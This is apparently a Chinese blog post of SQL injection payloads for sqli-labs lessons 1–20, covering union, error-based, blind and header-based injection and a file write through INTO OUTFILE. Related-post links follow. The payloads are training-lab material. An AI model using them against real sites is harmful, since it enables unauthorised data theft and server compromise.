1、
联合查询注入:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,user(),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select email_id from security.emails limit 1,1),3 --+

2、
同1
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,user(),3

3、
同1
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,user(),3 --+

4、
同1
http://127.0.0.1/sqli/Less-3/?id=-1") union select 1,user(),3 --+

5、
报错注入:
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select id from security.emails limit 0,1),0x7e),1) --+

布尔盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and left(database(),1)='s' --+ or http://127.0.0.1/sqli/Less-5/?id=1' and substr(database(),1,1)='s' --+ subsur从第一个字符开始每次只返回一个
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select id from security.emails limit 0,1),1,1)='1' --+

时间盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and if(length(database())>1,sleep(5),1) --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select id from security.emails limit 0,1),1,1)=1,sleep(5),1) --+

6、
同5
http://127.0.0.1/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+

7、
http://192.168.43.83/sqli/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\1.txt"#

8、
同5 布尔或时间盲注(无错误回显,所以无法报错注入)
http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>5 --+

9、
同5 时间盲注

10、
同5 双引号闭合 时间盲注
http://127.0.0.1/sqli/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1) --+

11、
POST注入 (万能密码)
联合查询注入/报错注入/盲注??
admin' order by 3 #
1' union select user(),database() #

12、
1") union select user(),database() #

13、
报错注入
1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

14、
双引号闭合
1" and updatexml(1,concat(0x7e,database(),0x7e),1) #

15、
布尔盲注
admin' and length(database())>1 #

16、
时间盲注
admin") and if(ascii(substr(database(),1,1))>1,sleep(5),1) #

17、
报错注入
username:admin
password:1' and updatexml(1,concat(0x7e,database(),0x7e),1) #

18、
User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

19、
Referer: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

20、
Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #

sqlilabs 1-20关 payload的更多相关文章

  1. sqli-labs通关----11~20关

    第十一关 从第十一关开始,就开始用post来提交数据了,我们每关的目的都是获取users表下password字段的内容. post是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常 ...

  2. SQL注入之Sqli-labs系列第四十一关(基于堆叠注入的盲注)和四十二关四十三关四十四关四十五关

    0x1普通测试方式 (1)输入and1=1和and1=2测试,返回错误,证明存在注入 (2)union select联合查询 (3)查询表名 (4)其他 payload: ,( ,( 0x2 堆叠注入 ...

  3. SQL注入之Sqli-labs系列第一关

    在开始接触渗透测试开始,最初玩的最多的就是Sql注入,注入神器阿D.明小子.穿山甲等一切工具风靡至今.当初都是以日站为乐趣,从安全法实施后在没有任何授权的情况下,要想练手只能本地环境进行练手,对于sq ...

  4. sqli-labs系列——第一关

    先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象.之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关. less1 尝试and1=2 ...

  5. XSS挑战20关

    第一关: 没有过滤,直接构造payload过关: http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/ ...

  6. SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)

    开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...

  7. SQL注入之Sqli-labs系列第二关

    废话不在多说  let's go!   继续挑战第二关(Error Based- Intiger) 同样的前奏,就不截图了 ,and 1=1和and 1=2进行测试,出现报错 还原sql语句 查看源代 ...

  8. sqli-labs第5关布尔盲注pyhton脚本

    import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num ...

  9. sqli-labs系列——第二关

    less2 and 1=1有回显,and 1=2无回显,为数值型注入 order by 4–+报错,有3行 查询数据库名 ?id=0' union select 1,(select group_con ...

随机推荐

  1. 最新 iOS 框架整体梳理(二)

    在前面一篇中整理出来了一些了,下面的内容是接着上面一篇的接着整理.上篇具体的内容可以点击这里查看:   最新 iOS 框架整体梳理(一) Part - 2          34.CoreTeleph ...

  2. Java与Swift对比

    本文链接:http://blog.csdn.net/msyqmsyq/article/details/53538159 从Java到Swift还是比较简单的,相比Object-C,Swift和Java ...

  3. 构造函数继承与class继承

    构造函数继承 1.子类通过apply方法或者call方法把this指向父类 js代码 function Parent(name, age) { this.name = name this.age = ...

  4. html中隐藏域hidden

    基本语法: <input type="hidden" name="field_name" value="value"> 作用: ...

  5. Go语言圣经[中文版]

    近期整理了一篇Go语言圣经[中文版]在线版本,排版比较适合手机以及PC阅读. Go语言圣经[中文版本]

  6. PE文件介绍 (1)

    PE文件介绍 PE文件主要是windows操作系统下使用的可执行文件格式,PE文件是指32位的可执行文件也叫做PE32,64位可执行文件叫做PE+或者PE32+ PE文件格式 种类 主扩展名 可执行类 ...

  7. 纯 HTML/CSS 高仿 Win10 加载动画

    自己做的超高仿Win10加载动画(应该是全网最像的 HTML 实现了),自己想用就拿去用吧 转圈加载 在线演示 HTML: <div class="loading"> ...

  8. Linux使用手册

    一.开关机 sync :把内存中的数据写到磁盘中(关机.重启前都需先执行sync) shutdown -rnow或reboot :立刻重启 shutdown -hnow :立刻关机 shutdown ...

  9. WIN10下如何解决PL2303驱动不可用的问题或者com口显示黄色感叹号usb-to-serial

    WIN10下如何解决PL2303驱动不可用的问题或者com口显示黄色感叹号usb-to-serial

  10. 绕过PowerShell执行策略方法总结

    默认情况下,PowerShell配置为阻止Windows系统上执行PowerShell脚本.对于渗透测试人员,系统管理员和开发人员而言,这可能是一个障碍,但并非必须如此. 什么是PowerShell执 ...